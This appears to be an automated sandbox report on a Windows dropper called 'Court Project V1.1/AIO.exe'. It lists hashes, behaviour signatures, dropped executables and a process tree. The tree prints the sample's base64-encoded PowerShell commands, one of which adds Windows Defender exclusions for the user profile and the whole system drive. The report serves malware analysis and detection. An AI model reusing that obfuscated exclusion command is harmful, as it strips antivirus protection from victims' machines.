Analysis

  • max time kernel
    92s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-12-2024 12:01

General

  • Target

    Court Project V1.1/AIO.exe

  • Size

    17.7MB

  • MD5

    401a1cbd5e2b10c3e4f167dc1f7bb4f1

  • SHA1

    ad74dfb0cb89794f0f13a21f35644ad51eab6ba7

  • SHA256

    22e7c140c849ad87f0d9f9624374045712c8a2f4c38befa85a92330fe2382316

  • SHA512

    df58e49d75dfe0b46057486d1117c422ff77d4b64d5bf4a14e0b9772600091b19d743793fdd7fc2e3031dc72cb6f50e0f1077cae3040a1dec9f5fe8df3464e8d

  • SSDEEP

    393216:kMr/sMzD1BTFAj8ItCGsm37tPIHHlWlf3TD:kWk0pBTFADzOnlM

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Court Project V1.1\AIO.exe
    "C:\Users\Admin\AppData\Local\Temp\Court Project V1.1\AIO.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcgBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAZQB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBmACAAbgBvAHQAIABlAHYAZQByAHkAdABoAGkAbgBnACAAVwBvAHIAawBzACAAUAByAG8AcABlAHIAbAB5ACAASQBuAHMAdABhAGwAbAAgAFAAeQB0AGgAbwBuACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBwAHQAdAAjAD4A"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbQBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZQB5ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4468
    • C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe
      "C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1720
    • C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:1524
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4616
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3180
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding AEBCF5BFA76F18839E939B5211B4B6AF C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    17KB

    MD5

    057500807cd6f31ddd71377b4315085b

    SHA1

    d3c7222b52296cc257180d59587d84e3d759db68

    SHA256

    89277b36b88f5d5c354743008c3f0cd26f062c718301487aa489fa5e2735f807

    SHA512

    67b0221701efa48e6d2ffe16f7c3dfaf229b2b684831a47b0c686336aa44ee67838f1636c3b1ce23631c276d385efc7f43615cade48cd25e29e847214b9ad119

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\PrepareDlgProgress.gif

    Filesize

    24KB

    MD5

    f550f449baed1315c7965bd826c2510b

    SHA1

    772e6e82765dcfda319a68380981d77b83a3ab1b

    SHA256

    0ee7650c7faf97126ddbc7d21812e093af4f2317f3edcff16d2d6137d3c0544d

    SHA512

    7608140bc2d83f509a2afdaacd394d0aa5a6f7816e96c11f4218e815c3aaabf9fc95dd3b3a44b165334772ebdab7dfa585833850db09442743e56b8e505f6a09

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\backbutton

    Filesize

    404B

    MD5

    50e27244df2b1690728e8252088a253c

    SHA1

    b84ad02fd0ed3cb933ffbd123614a2495810442b

    SHA256

    71836c56ec4765d858dc756541123e44680f98da255faf1ece7b83d79809b1c3

    SHA512

    ba3d3535bfd2f17919e1a99e89fdb1c9a83507ff3c2846c62770e210a50aee1281445d510858d247cc9619861089aaf20f45b0b7c39f15c0ea039ac5498fa03e

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\backgroundprepare

    Filesize

    134B

    MD5

    a0efb0e7b9cee25b09e09a1a64e96ba6

    SHA1

    0c1e18f6f5e6e5e6953e9fb99ca60fdec35d6e39

    SHA256

    f044f542bc46464054084c63596877f06c6e2c215c0e954c4ace9787ced82787

    SHA512

    7e53f9f564aaa529b3b15035671957c2923ec98ddee93758ea7a4c8645ee9058962078771b853e3490290fde1f57030dff5092d40d69418776ffee89f79c8a7c

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\browsebutton

    Filesize

    253B

    MD5

    9554be0be090a59013222261971430ad

    SHA1

    9e307b13b4480d0e18cfb1c667f7cfe6c62cc97c

    SHA256

    f4302ee2090bc7d7a27c4bc970af6eb61c050f14f0876541a8d2f32bc41b9bab

    SHA512

    ac316f784994da4fed7deb43fe785258223aba5f43cc5532f3e7b874adc0bc6dbcd8e95e631703606dfaa2c40be2e2bb6fa5bc0a6217efe657e74531654ea71c

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\checkbox

    Filesize

    1KB

    MD5

    0b044ccde7aa9d86e02a94030d744ac2

    SHA1

    0594ebb3737536703907ba5672ccd351c6afb98a

    SHA256

    bce5b6de3a1c7af7ec14b6643da25f7c9e15bd5f1c4a38abfcddc70a5e93bdd3

    SHA512

    dbfba793722589f1a76dbc75c9a2f3646733e4a079a6b70003716a7f7b8fa1a6a2b234ec9132f5737e91d20d460db1e29826b2d7ac740f73136975f19e336cd8

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_bottom_left.bmp

    Filesize

    66B

    MD5

    1fb3755fe9676fca35b8d3c6a8e80b45

    SHA1

    7c60375472c2757650afbe045c1c97059ca66884

    SHA256

    384ebd5800becadf3bd9014686e6cc09344f75ce426e966d788eb5473b28aa21

    SHA512

    dee9db50320a27de65581c20d9e6cf429921ebee9d4e1190c044cc6063d217ca89f5667dc0d93faf7dcc2d931fe4e85c025c6f71c1651cbd2d12a43f915932c3

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_bottom_mid.bmp

    Filesize

    66B

    MD5

    71fa2730c42ae45c8b373053cc504731

    SHA1

    ef523fc56f6566fbc41c7d51d29943e6be976d5e

    SHA256

    205209facdebf400319dbcb1020f0545d7564b9415c47497528593e344795afd

    SHA512

    ea4415619720cc1d9fb1bb89a14903bfd1471b89f9c4847df4839084aae573d49b4969d3799ad30ff25b71f6e31f8d9f30701e1240d3cd6a063819c04873f21f

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_caption.bmp

    Filesize

    206B

    MD5

    8641f45594b8d413bf1da25ce59f1207

    SHA1

    afebb23f5a55d304d028ca9942526b3649cddb52

    SHA256

    0403ed31d75dcc182dd98f2b603da4c36b6325e9d159cac4371e1448244bb707

    SHA512

    86a5f959f8462f866466dc706d3ae627b1fb019b8a33ee7fe48e3b69f92bf33dc0f1417c0d5116552b25b488bcb5d9050a33773e6883ebe08410267d95b2353a

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_left.bmp

    Filesize

    66B

    MD5

    30384472ae83ff8a7336b987292d8349

    SHA1

    85d3e6cffe47f5a0a4e1a87ac9da729537783cd0

    SHA256

    f545ec56bc9b690a6b952471669a8316e18274d64e2ebc9e365fcf44363a125a

    SHA512

    7611f930a0a1089cc5004203ec128c916f0c2aedae3a6fcc2eaffa8cd004dcbf154714e401947921a06896ca77c77daec7f9bda82369aacd3bb666f8a0331963

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_left_inactive.bmp

    Filesize

    66B

    MD5

    4b84f29fbce81aab5af97a311d0e51e2

    SHA1

    60723cf4b91c139661db5ecb0964deca1fc196ea

    SHA256

    c93be5a7c979c534274fc1a965d26c126efa5d58c14066b14937e5aba3b9eb55

    SHA512

    775eadccc44fddbd1e0d4231bc90d222f0a9749199e1963449ad20285ea92941a5685cdc12c0cd8c0ef0a21e10bdacaf139e5c69cd5e402cc110679323c23df1

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_top_left.bmp

    Filesize

    154B

    MD5

    1966f4308086a013b8837dddf88f67ad

    SHA1

    1b66c1b1ad519cad2a273e2e5b2cfd77b8e3a190

    SHA256

    17b5cd496d98db14e7c9757e38892883c7b378407e1f136889a9921abe040741

    SHA512

    ec50f92b77bca5117a9a262ba1951e37d6139b838099e1546ab2716c7bafb0fc542ce7f1993a19591c832384df01b722d87bb5a6a010091fc880de6e5cfa6c17

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\frame_top_mid.bmp

    Filesize

    66B

    MD5

    4e0ac65606b6aacd85e11c470ceb4e54

    SHA1

    3f321e3bbde641b7733b806b9ef262243fb8af3b

    SHA256

    1d59fe11b3f1951c104f279c1338fc307940268971d016ebe929a9998a5038ee

    SHA512

    7b28bcb4e76af3b863a7c3390b6cd3316c4631434e1d1e2df8d6e0eb9987a61a4f1a24de59567394e346d45e332403a0817ed0b0b64d7a624dbe48e30db9bb64

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\iconnnn.jpg

    Filesize

    60KB

    MD5

    4938b81c37711b169c3416f312939df3

    SHA1

    0fa44cb363ee08e0850d6bbc7aaa7164a0f9050c

    SHA256

    cd60622e290ff56e44e29d7ddc005dcefa70a7efda24a7e0075587d5039ad710

    SHA512

    fd69aadc8502ac3ace5f937b7b7f38bf70cc1b89baaf9826713d5061f993cd593683227d5110e040fddd5d02fa3a993c6d128949025ce85cb61978cc3b40484d

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\metroinstallbutton

    Filesize

    520B

    MD5

    70db38d656afa3778dcf6173d390e61b

    SHA1

    8b8674d6d70d67943d313d2b74222daa4bd1691d

    SHA256

    3a0a5b69f9da7cae9fc631326ed8aa97abbaaecf2bf15d0a73169a29f3381e83

    SHA512

    8888ab493c7342f69b33279eaec4f99c41a906929d65503c48c7059d199fbab267ba9ad6ef6e57a7a56d2a321c01e46008f770afe67fa99ec7b7676ec2376c05

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\nextcancelbuttons

    Filesize

    404B

    MD5

    583580e2c651f5c230fb3235b7ca0e3b

    SHA1

    a9bd6aeef43a6f4c0c00d1ecd98a585d7eb0aaa3

    SHA256

    65172283ee04f2fa18d0e57b21471be2e68017d1f61816aaaa6be070b446346f

    SHA512

    6c61e6c06c883113a7a0efbd352120354c070f5c17d770b6b821c42cb9d9ca895992842b29b51bd3e569b0c95e93709dd7c1c2a26bcff0ad425079f5302670ce

  • C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1524\sys_close_normal.png

    Filesize

    225B

    MD5

    8ba33e929eb0c016036968b6f137c5fa

    SHA1

    b563d786bddd6f1c30924da25b71891696346e15

    SHA256

    bbcac1632131b21d40c80ff9e14156d36366d2e7bb05eed584e9d448497152d5

    SHA512

    ba3a70757bd0db308e689a56e2f359c4356c5a7dd9e2831f4162ea04381d4bbdbef6335d97a2c55f588c7172e1c2ebf7a3bd481d30871f05e61eea17246a958e

  • C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe

    Filesize

    180KB

    MD5

    3075fc835b4f3b7b20dfee9ecc5dfaa0

    SHA1

    6cf171b5372ebad3adfafeeb6afa0b57b88dd9af

    SHA256

    81fdaf72bc2de5cdef33f74d867092172c40a5c1fe86c3313f9fcd0a0c22eac8

    SHA512

    41f81a88bab647ba079b5ee176213c392b172e73459396d18e249a8acd80b416d2bb8679b3a97cce9fd63ee18aadf0f9a552770f1de4685efb736114403f53e5

  • C:\Users\Admin\AppData\Local\Temp\IB_U_Z_Z_A_R_Dl\Illegal Services 6.1\install\707E587\IS.Setup.msi

    Filesize

    3.0MB

    MD5

    3255708b6cb705fe525f8b9fcc8b939a

    SHA1

    d3dec4db2c07e82c636e7c2b20f08accf2e6489c

    SHA256

    ff3e5b0baad11d798c2152eb01cdcf68775c123ac07f72cffb53b623ac9a71c5

    SHA512

    205bd7957a161c4c42ed2ce778378cfa81215a92a947f5ebca9327681cca60aa47ff5167a6afee8a49f1cc853c30bdf90f912e131d25891ef8fa1f34463e2b90

  • C:\Users\Admin\AppData\Local\Temp\IB_U_Z_Z_A_R_Dl\Illegal Services 6.1\install\decoder.dll

    Filesize

    205KB

    MD5

    912135871892d0b2685c3dc816e469a7

    SHA1

    193a30fb66b0d43fa3e372a503781cb9d9502c0b

    SHA256

    d4282c9805e7ff97a7bebcbbed608d7daa3dc4c72354690ba94b685550728549

    SHA512

    0b6936c036b033c3a3dc646dcb52163ceec9558ed9d679cef5e454b4e907c893c6ee2549c8e957ecd9bb70ed4b26e8f36cba69a39c0f80e197e656decf23c393

  • C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe

    Filesize

    17.5MB

    MD5

    f48ca4a6e5457dbb41d8de929da88c7c

    SHA1

    2908ae49cdaa4489ed80f25b8096bd79fb77ee42

    SHA256

    84dab96a11da002f640ba371f218c49fc3c13d192b9ffbae63cea45bf572ef2d

    SHA512

    a46e8e2fa8bb5f8f1c4158546c11c4b531047706ef4eb45bb288096d02d3d6212f4d92a13fb3d6402296256947558c470433ebcc9068f0a5712f9070e39b1bdd

  • C:\Users\Admin\AppData\Local\Temp\MSIC814.tmp

    Filesize

    436KB

    MD5

    475d20c0ea477a35660e3f67ecf0a1df

    SHA1

    67340739f51e1134ae8f0ffc5ae9dd710e8e3a08

    SHA256

    426e6cf199a8268e8a7763ec3a4dd7add982b28c51d89ebea90ca792cbae14dd

    SHA512

    99525aaab2ab608134b5d66b5313e7fc3c2e2877395c5c171897d7a6c66efb26b606de1a4cb01118c2738ea4b6542e4eb4983e631231b3f340bf85e509a9589e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gntkrhyg.pti.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1472-21-0x0000000004960000-0x0000000004982000-memory.dmp

    Filesize

    136KB

  • memory/1472-24-0x0000000004A70000-0x0000000004AD6000-memory.dmp

    Filesize

    408KB

  • memory/1472-25-0x00000000053D0000-0x0000000005724000-memory.dmp

    Filesize

    3.3MB

  • memory/1472-23-0x0000000004A00000-0x0000000004A66000-memory.dmp

    Filesize

    408KB

  • memory/1472-56-0x0000000005A70000-0x0000000005ABC000-memory.dmp

    Filesize

    304KB

  • memory/1472-55-0x0000000005A30000-0x0000000005A4E000-memory.dmp

    Filesize

    120KB

  • memory/1472-84-0x0000000005F30000-0x0000000005F4A000-memory.dmp

    Filesize

    104KB

  • memory/1472-83-0x0000000007090000-0x000000000770A000-memory.dmp

    Filesize

    6.5MB

  • memory/1720-15-0x00000000051B0000-0x000000000524C000-memory.dmp

    Filesize

    624KB

  • memory/1720-22-0x00000000053C0000-0x0000000005416000-memory.dmp

    Filesize

    344KB

  • memory/1720-19-0x0000000005320000-0x00000000053B2000-memory.dmp

    Filesize

    584KB

  • memory/1720-17-0x0000000005830000-0x0000000005DD4000-memory.dmp

    Filesize

    5.6MB

  • memory/1720-341-0x000000007369E000-0x000000007369F000-memory.dmp

    Filesize

    4KB

  • memory/1720-13-0x000000007369E000-0x000000007369F000-memory.dmp

    Filesize

    4KB

  • memory/1720-14-0x0000000000930000-0x0000000000962000-memory.dmp

    Filesize

    200KB

  • memory/1720-20-0x00000000052B0000-0x00000000052BA000-memory.dmp

    Filesize

    40KB

  • memory/4468-86-0x0000000006B50000-0x0000000006B82000-memory.dmp

    Filesize

    200KB

  • memory/4468-299-0x00000000070E0000-0x00000000070EE000-memory.dmp

    Filesize

    56KB

  • memory/4468-116-0x00000000070A0000-0x00000000070B1000-memory.dmp

    Filesize

    68KB

  • memory/4468-98-0x0000000006B90000-0x0000000006C33000-memory.dmp

    Filesize

    652KB

  • memory/4468-111-0x0000000007130000-0x00000000071C6000-memory.dmp

    Filesize

    600KB

  • memory/4468-321-0x00000000070F0000-0x0000000007104000-memory.dmp

    Filesize

    80KB

  • memory/4468-16-0x0000000002590000-0x00000000025C6000-memory.dmp

    Filesize

    216KB

  • memory/4468-87-0x0000000073F60000-0x0000000073FAC000-memory.dmp

    Filesize

    304KB

  • memory/4468-334-0x00000000071D0000-0x00000000071EA000-memory.dmp

    Filesize

    104KB

  • memory/4468-335-0x0000000007120000-0x0000000007128000-memory.dmp

    Filesize

    32KB

  • memory/4468-97-0x0000000006140000-0x000000000615E000-memory.dmp

    Filesize

    120KB

  • memory/4468-99-0x0000000006F20000-0x0000000006F2A000-memory.dmp

    Filesize

    40KB

  • memory/4468-18-0x0000000005040000-0x0000000005668000-memory.dmp

    Filesize

    6.2MB